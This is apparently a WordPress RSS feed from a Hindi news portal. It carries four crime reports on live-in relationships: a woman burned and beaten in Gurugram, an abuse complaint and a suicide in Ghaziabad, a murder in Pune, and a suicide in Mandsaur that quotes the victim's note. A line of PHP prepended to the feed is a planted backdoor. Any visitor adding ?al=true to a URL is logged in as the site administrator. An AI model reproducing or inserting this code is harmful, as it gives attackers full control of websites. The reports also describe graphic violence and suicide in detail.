// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); live-in partner – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 22 Feb 2026 07:25:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 लिव इन पार्टनर के प्राइवेट पार्ट्स में लगाई आग, हवस मिटाने के बाद लड़की संग हैवानियत https://pratyushaashakinayikiran.com/?p=199928 Sun, 22 Feb 2026 07:25:00 +0000 https://pratyushaashakinayikiran.com/?p=199928 गुरुग्राम.

इंदौर में एमबीए स्टूडेंट के साथ हुई दरिंदगी जैसी घटना गुरुग्राम से भी सामने आई है। यहां एक 19 साल की लड़की के साथ उसके लिव इन पार्टनर ने हैवानियत की हदें पार कर दीं। पहले तो वह उसे शादी का झांसा देकर संबंध बनाता रहा और अब उसकी जान लेने पर उतारू हो गया।

आरोपी ने झगड़ा होने के बाद ना सिर्फ लड़की को बुरी तरह पीटा बल्कि उसके प्राइवेट पार्ट्स पर सेनिटाइजर छिड़ककर आग लगा दी। पीड़िता की हालत गंभीर है और वह दिल्ली के सफदरजंग अस्पताल में भर्ती है। गुरुग्राम की एक नामी यूनिवर्सिटी से बायोटेक की पढ़ाई करने वाली पीड़िता मूल रूप से त्रिपुरा की रहने वाली है। हाथ, मुंह, पैर पर प्राइवेट पार्ट्स पर गंभीर जख्मों के साथ अस्पताल में भर्ती पीड़िता ने जो आपबीती पुलिस को बताई वह बेहद खौफनाक है। पीड़िता ने बताया कि उसका लिव इन पार्टनर शिवम (19) लगातार तीन दिन तक उस पर जुल्म करता रहा। वह शादी का झांसा देकर उसके साथ जबरन संबंध बनाता था।

चाकू से वार, प्राइवेट पार्ट में आग लगाई, न्यूड वीडियो बनाए
इसी दौरान आरोपी उस पर शक करने लगा और उसके साथ मारपीट करने लगा। गत 16 फरवरी को आरोपी ने पीड़िता को बेरहमी से पीटा। आरोप है कि स्टील की बोतल से आरोपी ने उसके सिर पर हमला किया। सिर को दीवार और फर्नीचर से टकराया। मटका उसके सिर पर फोड़ दिया। उसके प्राइवेट पार्ट पर सेनिटाइजर डालकर आग लगा दी। आरोपी ने चाकू से उसके पैर में कई बार वार किए। उसे धमकी दी कि वो उसे इतना मारेगा कि वो चल भी नहीं पाएगी। कभी मां नहीं बन सकेगी। पीड़िता ने आरोप लगाया है कि आरोपी ने उसके न्यूड वीडियो भी बनाए हैं।

ऐप से हुई दोस्ती और फिर लिव इन पार्टनर बने
पीड़िता आरोपी शिवम के साथ सेक्टर-69 के एक पीजी में लिव-इन में रह रही थी। पुलिस की जांच में सामने आया कि छात्रा की शिवम से दोस्ती पिछले साल सितंबर में सोशल मीडिया ऐप के माध्यम से हुई थी। उसके बाद दोनों ने मिलना शुरू कर दिया। दोनों की दोस्ती कुछ ही दिनों में प्यार में बदलगई और बात शादी के वादे तक पहुंच गई। उसके बाद छात्रा और आरोपी लगभग डेढ़ से दो महीने से पीजी में लिव-इन में एक साथ रह रहे थे। शादी को लेकर दोनों में कई बार कहासुनी होती थी। यह भी पता चला है कि आरोपी को छात्रा के चरित्र पर शक था। गुरुवार की रात दोनों के बीच कहासुनी हुई। देखते ही देखते आरोपी ने छात्रा पर लात और मुक्के बरसाने शुरू कर दिए। छात्रा के हाथ, मुंह और पैर पर काफी निशान मिले हैं।

मां का फोन आया तो बच गई जान
पीड़िता की मां ने संयोग से मारपीट के दौरान ही अपनी बेटी को फोन किया। फोन पर बेटी की चीखें सुनकर मां ने तुरंत पुलिस को सूचना दी। बादशाहपुर थाना पुलिस जब मौके पर पहुंची, तो कमरा अंदर से बंद था। दरवाजा तोड़ने पर पुलिस ने देखा कि छात्रा लहुलुहान हालत में पड़ी थी। आरोपी उसे पीट रहा था। पुलिस प्रवक्ता संदीप तूरन ने बताया कि मामला दर्ज कर आरोपी शिवम को गिरफ्तार किया गया है। पुलिस ने आरोपी के खिलाफ बीएनएस की धारा 115, 118(1), 118(2), 127(2), 69 और 351(2) के तहत केस दर्ज किया है।

]]>
प्रेमी की बात सुन प्रेमिका के उड़े होश, लिव इन पार्टनर से शादी कर बुरी फंसी!, आरोपित ने की मारपीट https://pratyushaashakinayikiran.com/?p=127107 Thu, 30 Jan 2025 19:35:00 +0000 https://pratyushaashakinayikiran.com/?p=127107 गाजियाबाद
कविनगर थाना क्षेत्र निवासी एक युवती ने अपने लिव इन पार्टनर पर दिखावे के लिए शादी करने और दोस्तों से संबंध बनाने के लिए कहने का आरोप लगाया है। पीड़िता का कहना है कि जब उसने मना किया तो आरोपित ने उनके साथ मारपीट की। पीड़िता की शिकायत पर कविनगर थाने में पुलिस ने केस दर्ज कर मामले की जांच शुरू की है।

कितने समय तक लिव इन रिलेशन में रही युवती?
पुलिस को दी शिकायत में पीड़िता ने बताया कि वह अवंतिका निवासी विकास त्यागी के साथ एक साल तक लिव इन रिलेशन में रहीं। जब उन्होंने शादी के लिए कहा तो विकास ने मना कर दिया और मारपीट की। परेशान होकर युवती ने पुलिस को शिकायत कर दी। पुलिस के आने पर विकास और उसके स्वजन शादी के लिए तैयार हो गए।

दोस्तों के साथ संबंध नहीं बनाने पर की मारपीट
पीड़िता के मुताबिक स्वजन ने विकास के साथ उसकी शादी करा दी। शादी के बाद विकास ने अपने दोस्त वैभव चौहान के साथ मिलकर उनके जबरन एक पत्र तैयार कराया जिसमें लिखवाया कि उसने शादी अपनी मर्जी से की है।

युवती ने बताई युवक के शादी करने की वजह
पीड़िता का आरोप है कि विकास ने कई बार उसे अपने दोस्तों के साथ संबंध बनाने के लिए कहा था। मना करने पर मारपीट की गई। पीड़िता का कहना है कि विकास ने उसे बताया कि उसने शादी दुष्कर्म के मुकदमे से बचने के लिए की है। पीड़िता की शिकायत पर पुलिस ने मामले की जांच शुरू कर दी है।

शादी के सात माह बाद महिला ने की आत्महत्या
एक अन्य मामले में गाजियाबाद के प्रताप विहार की संघर्ष कॉलोनी में रहने वाली एक महिला ने बुधवार सुबह घर में फंदे से लटककर आत्महत्या कर ली। प्रारंभिक जांच में मामला घरेलू विवाद का लग रहा है। साजरुन की सात महीने पहले बहराइच के जुनैद से शादी हुई थी। दोनों पिछले तीन महीने से विजयनगर में रह रहे थे।

जुनैद एक होटल पर हेल्पर का काम करता है। बुधवार सुबह 10 बजे वह होटल से घर खाना खाने आया तो दरवाजा बंद मिला। खिड़की से देखा तो कमरे में पत्नी फंदे से लटकी मिली। आसपास के लोगों की मदद से खिड़की तोड़कर अंदर जाकर उसे फंदे से उतारा। एसीपी कोतवाली रितेश त्रिपाठी का मौके पर सुसाइड नोट नहीं मिला है, शव को पोस्टमार्टम के लिए भेजा गया है।

]]>
पुणे में 32 वर्षीय सुपरवाइजर ने 27 वर्षीय लिव-इन पार्टनर की ली जान, शव को 130 किमी दूर जाकर झाड़ियों में फेंका https://pratyushaashakinayikiran.com/?p=103864 Thu, 28 Nov 2024 16:46:00 +0000 https://pratyushaashakinayikiran.com/?p=103864 पुणे
 एक एसी मेंटेनेंस फर्म में सुपरवाइजर के तौर पर काम करने वाले 32 वर्षीय शख्स को वाकड़ पुलिस ने गिरफ्तार किया है। शख्स पर अपनी लिव-इन पार्टनर (27) की हथौड़े से पीट-पीटकर हत्या करने का आरोप है। घटना हैरान कर देने वाली है। हत्या के बाद आरोपी लिव इन पार्टनर की लाश को ठिकाने लगाने के लिए 130 किमी दूर गया। उसके बाद अपने तीन साल के बेटे को मंदिर के शहर अलंदी में छोड़ आया। बाद में बच्चे के लापता होने की खुद ही शिकायत दर्ज कराई। उसने पुलिस को गुमराह करने के लिए कहानी गढ़ी लेकिन पकड़ा गया।

पुलिस ने बताया कि 24 नवंबर की रात को वाकड़ में सर्विस रोड पर अपने साथी की हत्या करने के बाद, व्यक्ति ने शव को अपने चार पहिया वाहन में लगभग 130 किलोमीटर दूर सतारा जिले के खंडाला तहसील के खंबाटकी घाट तक ले जाकर फेंक दिया। बाद में, वह मारुंजी में अपने फ्लैट पर वापस आया और सोते हुए लड़के को लगभग 30 किलोमीटर दूर अलंदी ले गया और उसे वहीं छोड़ दिया।

किसी और के साथ अफेयर का था शक

वरिष्ठ निरीक्षक निवृति कोल्हटकर ने बताया कि गिरफ्तार किए गए व्यक्ति ने अपनी लिव-इन पार्टनर की हत्या करने की बात स्वीकार की है। उसने ऐसा इसलिए किया क्योंकि उसे शक था कि उसकी पार्टनर का किसी और व्यक्ति के साथ संबंध है।

6 सालों से लिव इन में रह रही थी

महिला बीड जिले के परली की रहने वाली थी। वह शादी के छह महीने बाद ही अपने पति से अलग हो गई थी और पिछले पांच-छह सालों से फर्म के सुपरवाइजर के साथ लिव-इन रिलेशनशिप में थी। सुपरवाइजर भी शादीशुदा है और उसकी पत्नी और बच्चे मावल तहसील के बौर में रहते हैं। वह हिंजेवाड़ी में एक चाय की दुकान भी चलाता है। उसने मारुंजी में एक फ्लैट किराए पर लिया था, जहां उसकी लिव-इन पार्टनर अपने बेटे के साथ रह रही थी।

ऐसे मिला लड़का

कोल्हटकर ने बताया कि 25 नवंबर की शाम को व्यक्ति ने हिंजेवाड़ी पुलिस से अपने बेटे के लापता होने की शिकायत दर्ज कराने के लिए संपर्क किया, जिसे उसने खुद अलंदी में छोड़ दिया था। वरिष्ठ निरीक्षक ने कहा कि जब वह व्यक्ति पुलिस स्टेशन में था, तब हिंजेवाड़ी पुलिस को पता चला कि उसका लड़का आलंदी में पाया गया है और वह वहां की पुलिस की हिरासत में है।

लिव इन पार्टनर के गायब होने की छिपाई बात

हिंजेवाड़ी पुलिस ने उसे अपने वाकड समकक्षों से संपर्क करने के लिए कहा क्योंकि उसने उन्हें बताया कि लड़का भुमकर चौक इलाके से लापता हो गया है। उसने महिला के बारे में कुछ भी नहीं बताया। जब पुलिस को पता चला कि लड़के की मां लापता है, तो उन्होंने उसे हिरासत में नहीं लिया और उससे कहा कि वह पहले उसकी गुमशुदगी की शिकायत दर्ज कराए। उन्होंने लड़के के नाना-नानी को सूचित किया, जो बाद में आलंदी के लिए रवाना हो गए।

ट्रक ड्राइवर ने देखी महिला की लाश

26 नवंबर की सुबह, वह व्यक्ति वाकड पुलिस स्टेशन पहुंचा और अपने साथी से संबंधित गुमशुदगी की शिकायत दर्ज कराई। इधर 26 नवंबर को, एक ट्रक चालक का ट्रक खंबाटकी घाट सेक्शन में पास खराब हो गया। वह वहां रुका था, तभी उसने झाड़ियों में एक महिला का शव देखा। शख्स ने खंडाला पुलिस को सूचित किया। उन्होंने बताया कि पुलिस ने पाया कि महिला के शरीर पर चोटें थीं।

ऐसे पुलिस ने पकड़ा

कोल्हटकर ने कहा कि उन्हें आश्चर्य है कि जब वह अपने बेटे की गुमशुदगी की शिकायत दर्ज कराने के लिए हिंजेवाड़ी पुलिस के पास गया तो उसने अपने साथी के बारे में क्यों नहीं बताया। कोल्हटकर ने कहा कि जब हमने उसके सेलफोन रिकॉर्ड की जांच की तो पता चला कि 24 नवंबर से 26 नवंबर के बीच उसका गैजेट नियमित अंतराल पर बंद था।

बुधवार को मामला तब बदल गया जब सतारा पुलिस ने पिंपरी चिंचवाड़ पुलिस को खंबाटकी घाट सेक्शन में महिला के शव के बारे में सूचित किया। हमने पाया कि लापता महिला और शव पर मंगलसूत्र एक ही था। फिर हम उस व्यक्ति को पूछताछ के लिए पुलिस स्टेशन ले आए। उसने 24 नवंबर की देर रात भूमकर चौक के पास सर्विस रोड पर हथौड़े से अपने लिव-इन पार्टनर की हत्या करने की बात स्वीकार की। फिर उसने शव को खंबाटकी घाट सेक्शन में फेंक दिया। उन्होंने बताया कि व्यक्ति को हत्या, साक्ष्य नष्ट करने तथा बीएनएस के एक अपराधी को बचाने के लिए झूठी सूचना देने के आरोप में गिरफ्तार किया गया।

]]>
मंदसौर में फिजियोथेरेपिस्ट युवती ने फांसी लगाकर सुसाइड कर लिया https://pratyushaashakinayikiran.com/?p=36278 Fri, 31 May 2024 16:26:00 +0000 https://pratyushaashakinayikiran.com/?p=36278 मंदसौर

मध्य प्रदेश के मंदसौर में एक फिजियोथेरेपिस्ट युवती ने कथित तौर पर फांसी लगाकर सुसाइड कर लिया। युवती द्वारा मौत को गले लगाने की असल वहज प्यार में मिला धोखा था। युवती ने आत्महत्या से पहले बकायदा 8 पेज का सुसाइड नोट लिखा है, जिसमें उसने प्रेमी से मिले धोखे का पूरा दर्द बयां किया है। इतना ही नहीं, मरने से पहले उसने सोशल मीडिया पर चार पोस्ट भी किए थे। तीन में लेटर और एक में प्रेमी के साथ फोटो अपलोड किए हैं। सुसाइड नोट में लिखा- 'अलविदा बकवास दुनिया और बकवास लोग। अलविदा मेरी जान.. ये जान तुझ पर कुर्बान। कहा था न तुम्हारे बिना जी नहीं पाऊंगी। आखिर तुमने मुझे मार ही डाला।'

मंदसौर के पिपलियामंडी नगर की रहने वाली युवती डॉ. आशु मेघवाल (Dr. Ashu Meghwal) की मौत के बाद परिजन भड़क गए। गुस्साए परिजनों ने गुरुवार को भीम आर्मी के कार्यकर्ताओं के साथ युवती के शव को हाईवे पर रखकर चक्का जाम कर दिया। परिजनों ने युवती की आत्महत्या के लिए उसके प्रेमी को जिम्मेदार ठहराते हुए उसकी जल्द गिरफ्तारी और उसके मकान पर बुलडोजर चलाने की मांग की है। परिजनों का यह प्रदर्शन करीब एक घंटे तक चला।

प्रेमी पर प्यार में धोखा देने का आरोप लगाया

मृतक युवती नर्सिंग का कोर्स पूरा कर चुकी थी और अभी वह फिजियोथेरेपिस्ट का कोर्स कर रही थी। उसने अपने सोशल मीडिया अकाउंट पर एक पोस्ट में पिता के नाम 2 पेज का पत्र लिखते हुए माफी मांगी है। उसने लिखा- 'माफ कर देना पापा'। वहीं, दूसरी पोस्ट में जितेंद्र नागदा पर प्यार में धोखा देने का आरोप लगाया और तीसरी पोस्ट में युवक के साथ 10 फोटो अपलोड किए। जितेंद्र नागदा मंदसौर में लॉ प्रैक्टिस करता है।

युवती के परिजन ने बताया कि दोनों काफी समय से लिव-इन रिलेशन में रह रहे थे, लेकिन लड़के ने 5 महीने पहले किसी और से शादी कर ली। शादी के बाद दोनों अलग हो गए थे। कुछ समय बाद प्रेमी जितेंद्र फिर लड़की से मिला। उसने कहा था कि परिवारवालों की खुशी के लिए उसने शादी की है। मैं पत्नी को तलाक देकर तुमसे शादी करूंगा। बीते सोमवार को दोनों दोपहर 3 बजे से रात 8 बजे तक साथ में रहे, लेकिन रात में जितेंद्र का छोटा भाई आया और गालियां देने लगा। उसने कहा- तुम्हारी लड़की मेरे भाई को फंसा रही है। इसके बाद जितेन्द्र और उसके परिजनों का मृतका के परिवारवालों से विवाद होने लगा। इस बीच युवती के प्रेमी ने फिर उससे शादी करने का मना कर दिया। फिर क्या था प्यार में आहत युवती ने मौत को गले लगा लिया।

लिव-इन पार्टनर के पिता पर धमकाने का आरोप

युवती के परिवार का आरोप है कि युवक के पिता पहले भी दो बार उनके घर आकर धमका चुके हैं। हमारे आने के बाद भी उन्होंने धमकाया था। इस दौरान युवती ने कहा था कि अपने पिता और भाई को बुला लो, पता चल जाएगा कौन झूठ बोल रहा है। हम एक घंटे तक इंतजार करते रहे, लेकिन कोई नहीं आया। वे बहाने बनाने लगे कि बीपी लो हो गया है। इस पर हम, लड़की को लेकर अपने दोस्तों के साथ उसके घर गए। घर पर उनका पूरा परिवार बैठा हुआ था। युवती ने कहा कि तुमने मुझसे शादी का वादा किया, अब अपने पिता के सामने यही बात कहो। जितेंद्र ने अभद्रता करते हुए शादी से मना कर दिया। उसने युवती से काफी पैसे भी लिए थे।

पुलिस ने लिव-इन पार्टनर पर दर्ज की एफआईआर

पिपलिया मंडी चौकी प्रभारी कपिल सौराष्ट्रीय ने बताया कि इस मामले में लड़की के सुसाइड नोट के आधार पर केस दर्ज कर लिया गया है। पुलिस अब पूरे मामले की जांच में जुट गई है। जितेंद्र नागदा मंदसौर में लॉ प्रैक्टिस करता है। चार-पांच महीने पहले उसकी शादी हो चुकी है। दोनों के बीच अफेयर था। जांच में यदि उसके पिता भी दोषी पाए जाते हैं तो उन पर भी कार्रवाई की जाएगी।

 

]]>